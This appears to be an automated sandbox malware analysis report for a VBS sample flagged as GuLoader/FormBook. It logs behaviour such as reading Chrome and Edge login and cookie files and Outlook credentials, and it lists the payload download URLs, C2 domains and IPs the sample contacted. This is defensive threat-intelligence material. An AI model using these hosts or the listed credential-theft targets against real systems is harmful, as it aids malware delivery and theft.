Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\verclsid.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	321 Scripting	Valid Accounts	1 Windows Management Instrumentation	321 Scripting	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	114 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	511 Process Injection	4 Obfuscated Files or Information	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
10145202485.vbs	18%	ReversingLabs	Script-WScript.Trojan.GuLoader

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
promenter.rs	77.105.36.128	true	false	unknown
www.newhopetoday.app	216.40.34.41	true	false	unknown
ladylawher.org	3.33.130.190	true	false	unknown
www.svarus.online	194.58.112.174	true	false	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
www.ladylawher.org	unknown	unknown	true	unknown
aszzzw_6777.6777.6777.677e	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://promenter.rs/XWpZCkLt231.bin	false	unknown
http://www.ladylawher.org/tcwz/	false	unknown
http://www.newhopetoday.app/y868/	false	unknown
http://www.newhopetoday.app/y868/?w2h=/snO2OMeD1KGuCX8I8PTb0wPk7oIGCcnJpJV3p53H8t3rhvkFO7Hu8uja/+IWsU7s0a4pmtYzeb4/oul2jeOgVvnrxX99+b5swpR4hpoIEYOJyEs1w==&1DbH=RRW4t2_hkFqt	false	unknown
http://www.svarus.online/sa87/?1DbH=RRW4t2_hkFqt&w2h=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8EnOz0KyJHucPzLziv8XmKKnO8TJ+EQ==	false	unknown
https://promenter.rs/Dipodid.pfm	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.1506470995.000001BDA3983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.1663709483.0000000004BF7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://promenter.rs/XWpZCkLt231.binP	msiexec.exe, 0000000A.00000002.2189354593.00000000088BA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.microsoft	powershell.exe, 00000005.00000002.1512078603.000001BDABE34000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.1663709483.0000000004BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1692631660.00000000075DF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000005.00000002.1485319278.000001BD944E8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://promenter.rs/XWpZCkLt231.binI	msiexec.exe, 0000000A.00000002.2189354593.00000000088BA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft/pkirl/product	powershell.exe, 00000005.00000002.1512078603.000001BDABE34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://promenter.rs/XWpZCkLt231.binH	msiexec.exe, 0000000A.00000002.2189354593.00000000088BA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://promenter.rs	powershell.exe, 00000005.00000002.1485319278.000001BD956A5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.ma	powershell.exe, 00000005.00000002.1513698907.000001BDABFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.1663709483.0000000004BF7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://promenter.rs/Dipodid.pfmP	powershell.exe, 00000005.00000002.1485319278.000001BD93B36000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://promenter.rs	powershell.exe, 00000005.00000002.1485319278.000001BD93B36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1485319278.000001BD94F5A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6lB	powershell.exe, 00000007.00000002.1663709483.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.1506470995.000001BDA3983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://promenter.rs/Dipodid.pfmXRyl	powershell.exe, 00000007.00000002.1663709483.0000000004BF7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.1485319278.000001BD93911000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.1485319278.000001BD93911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1663709483.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.58.112.174	www.svarus.online	Russian Federation	197695	AS-REGRU	false
77.105.36.128	promenter.rs	Serbia	9125	ORIONTELEKOM-ASRS	false
3.33.130.190	ladylawher.org	United States	8987	AMAZONEXPANSIONGB	false
216.40.34.41	www.newhopetoday.app	Canada	15348	TUCOWSCA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1533834
Start date and time:	2024-10-15 09:14:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	10145202485.vbs
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winVBS@17/8@5/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 66% Number of executed functions: 73 Number of non-executed functions: 268
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7816 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8040 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 10145202485.vbs

Simulations

Behavior and APIs

Time	Type	Description
03:14:59	API Interceptor	90x Sleep call for process: powershell.exe modified
03:16:57	API Interceptor	6x Sleep call for process: verclsid.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.58.112.174	PR. No.1599-Rev.2.exe	Get hash	malicious	Unknown	Browse	www.dpo-medicina.online/e3vl/
	N2Qncau2rN.exe	Get hash	malicious	FormBook	Browse	www.torex33.online/hd7m/
	FDA.exe	Get hash	malicious	FormBook	Browse	www.synd.fun/mamj/
	YSjOEAta07.exe	Get hash	malicious	FormBook	Browse	www.les-massage.online/74ou/
	Pending invoices.exe	Get hash	malicious	FormBook	Browse	www.broker-izh.online/ci4a/
	SOA SIL TL382920.exe	Get hash	malicious	FormBook	Browse	www.synd.fun/pisq/
	Arrival notice.exe	Get hash	malicious	FormBook	Browse	www.albero-dveri.online/1yii/?EZ2lo=S7820Y1cJZfxr22K40lVRI+qrmhalVt3Xj4gyHqd7MQTNmhmHaxoWGfNrnng7EIbxAFiJvsMf3T0ofXi1SEumpqeoP3XzrB7Dn3j9lk1UX6QYnk/Rw==&7NP=7FXXUPl
	-pdf.bat.exe	Get hash	malicious	FormBook	Browse	www.albero-dveri.online/7cy1/
	hH4dbIGfGT.exe	Get hash	malicious	FormBook	Browse	www.les-massage.online/f2hb/
	Fvqw64NU4k.exe	Get hash	malicious	FormBook	Browse	www.les-massage.online/f2hb/
77.105.36.128	f5#U06f6.vbs	Get hash	malicious	FormBook, GuLoader	Browse
77.105.36.128	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse
3.33.130.190	Bukw54qAxf.exe	Get hash	malicious	FormBook	Browse	www.techtalks.live/bopi/?rxltiN=ByUa8OppipSjvsB1AjlBSWluyrmxCMFqSamo3/fZr1sZUY0l87vOSnRQaXIiJAtuExkF&1bz=o8ed4
	PR. No.1599-Rev.2.exe	Get hash	malicious	Unknown	Browse	www.ladylawher.shop/slpb/
	quote894590895pdf.exe	Get hash	malicious	FormBook	Browse	www.trencheslondon.store/bba0/
	COMMERCIAL INVOICES.exe	Get hash	malicious	FormBook	Browse	www.nibcorp.xyz/qy56/
	TUj6dgsTTR.exe	Get hash	malicious	FormBook	Browse	www.doggieradio.net/szy7/
	EKTEDIR.exe	Get hash	malicious	FormBook	Browse	www.warriorsyndrome.net/yled/
	AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Get hash	malicious	FormBook	Browse	www.levelsabovetravel.info/kbee/
	NjjLYnPSZr.exe	Get hash	malicious	FormBook	Browse	www.mybodyradar.net/qyz6/
	lByv6mqTCJ.exe	Get hash	malicious	FormBook	Browse	www.rjscorp.org/cei6/
	3wgZ0nlbTe.exe	Get hash	malicious	FormBook	Browse	www.huemanstudio.today/0g5h/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	AUS-PO79282024.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	XOH01xpqM2.jar	Get hash	malicious	Branchlock Obfuscator, Dynamic Stealer	Browse	13.107.246.45
	https://486c9ed9266e5aa980000530de1a7faee8be5484d9b948f8e156ba7c45.pages.dev/47719c21c318cb8ebd2e/c4e4d5b1f10925#Qm1OTURwIjoid28iLCJGQm0iOiJ3byIsImVtIjoiWjJGaWFTNWlhV1ZuUUdsd2NtOTBaWGd1WkdVPSIsIm1OTURwZ2kiOiJ3byIsIlA2RkJtIjoid28iLCIwYVA2Ijoid28=	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Inbox.mbox	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://prezi.com/i/mgr6trutyxnd/	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://crazy-moments.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://mariomuka.com/m/?c3Y9bzM2NV8xX3NwJnJhbmQ9YWpseE1GRT0mdWlkPVVTRVIwMTEwMjAyNFU0MjEwMDEzNA=#dkrasner@summitbhc.com	Get hash	malicious	Mamba2FA	Browse	13.107.246.45
	https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUMkdUS1ZSOU9NRVI2WU9PNk1FUzFMRTRBUS4u&sharetoken=hejMJEowqy4fkqmJD9lY	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	SecuriteInfo.com.W32.CoinMiner.BELF.tr.5577.21403.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	Hi_Goodmorning!_tel.com_#8593171100.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
promenter.rs	f5#U06f6.vbs	Get hash	malicious	FormBook, GuLoader	Browse	77.105.36.128
promenter.rs	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	77.105.36.128

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUCOWSCA	file.exe	Get hash	malicious	Unknown	Browse	64.99.192.91
	firmware.armv7l.elf	Get hash	malicious	Unknown	Browse	216.40.34.37
	firmware.i586.elf	Get hash	malicious	Unknown	Browse	216.40.34.37
	firmware.i686.elf	Get hash	malicious	Unknown	Browse	216.40.34.37
	UnmxRI.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	216.40.34.41
	ptsss.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
	Mac Purchase Order PO102935.xls	Get hash	malicious	FormBook	Browse	216.40.34.41
	PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
	Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
	Salary Raise.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
AMAZONEXPANSIONGB	Bukw54qAxf.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	https://jobs.sap.com/job/Hamburg-Virtual-Customer-Success-Partner-%28fmd%29-SAP-Signavio-%28German-speaker%29-20148/1114878901/	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://jobs.sap.com/job/Walldorf-SAP-Ariba-Technology-Consultant-EMEA-ISBN-Technology-Services-%28Location-Germany%29-69190/1110452901/	Get hash	malicious	Unknown	Browse	52.223.40.198
	PR. No.1599-Rev.2.exe	Get hash	malicious	Unknown	Browse	3.33.130.190
	http://currently0734.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	https://www.finaltestwebsite.duckdns.org/UpdateVerifyPrss!/Scotiabank/?key=5050d2156464f8b75b40f3d8cba168a3d4aa145e	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46atMmRo3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbmy4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v7LR3jPEjzYXr2LwuykYQnzvV6boWlogU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testoffer	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://shawri.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.19.53
	https://shawri.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
AS-REGRU	PR. No.1599-Rev.2.exe	Get hash	malicious	Unknown	Browse	194.58.112.174
	http://coin-have.c0m	Get hash	malicious	Unknown	Browse	194.58.116.35
	alWUxZvrvU.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	3wgZ0nlbTe.exe	Get hash	malicious	FormBook	Browse	31.31.196.17
	RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exe	Get hash	malicious	FormBook	Browse	31.31.196.17
	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	N2Qncau2rN.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	FDA.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	YSjOEAta07.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	Pending invoices.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
ORIONTELEKOM-ASRS	na.elf	Get hash	malicious	Mirai	Browse	109.121.40.179
	f5#U06f6.vbs	Get hash	malicious	FormBook, GuLoader	Browse	77.105.36.128
	Confirmation.docx.exe	Get hash	malicious	DBatLoader, Lokibot	Browse	77.105.36.123
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	77.105.36.128
	botx.arm.elf	Get hash	malicious	Mirai	Browse	79.175.73.90
	megerosites.cmd	Get hash	malicious	DBatLoader, Lokibot	Browse	77.105.36.123
	Uplata_391.cmd	Get hash	malicious	DBatLoader	Browse	77.105.36.123
	iazK5m3L51.elf	Get hash	malicious	Mirai	Browse	79.175.73.83
	Ajanlatkeres_2024.05.29.PDF.exe	Get hash	malicious	FormBook, Lokibot	Browse	77.105.36.123
	Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm	Get hash	malicious	FormBook	Browse	77.105.36.123

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SMX-ACH0036173.vbs	Get hash	malicious	FormBook, GuLoader	Browse	77.105.36.128
	H#4051-5353.vbs	Get hash	malicious	AsyncRAT	Browse	77.105.36.128
	EXTRATO COMBINADO 2024009.vbs	Get hash	malicious	Unknown	Browse	77.105.36.128
	Purchase Order.js	Get hash	malicious	AgentTesla	Browse	77.105.36.128
	PEDIDO DE COMPRA RUTESA 2805-e9.vbs	Get hash	malicious	Unknown	Browse	77.105.36.128
	v.ps1	Get hash	malicious	PureLog Stealer	Browse	77.105.36.128
	Bukw54qAxf.exe	Get hash	malicious	FormBook	Browse	77.105.36.128
	rPaymentswift.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	77.105.36.128
	segura.vbs	Get hash	malicious	AsyncRAT	Browse	77.105.36.128
	asegurar.vbs	Get hash	malicious	Unknown	Browse	77.105.36.128
37f463bf4616ecd445d4a1937da06e19	SMX-ACH0036173.vbs	Get hash	malicious	FormBook, GuLoader	Browse	77.105.36.128
	v.ps1	Get hash	malicious	PureLog Stealer	Browse	77.105.36.128
	tiCW7a3x1P.exe	Get hash	malicious	Vidar	Browse	77.105.36.128
	rGuayaqui.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	77.105.36.128
	45Uxq9FWr7.exe	Get hash	malicious	Unknown	Browse	77.105.36.128
	SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exe	Get hash	malicious	Unknown	Browse	77.105.36.128
	Topstillinger.exe	Get hash	malicious	FormBook, GuLoader	Browse	77.105.36.128
	08102024_1541_Beschwerde-Rechtsanwalt.vbs	Get hash	malicious	GuLoader, Remcos	Browse	77.105.36.128
	Beschwerde-Rechtsanwalt.vbs	Get hash	malicious	GuLoader, Remcos	Browse	77.105.36.128
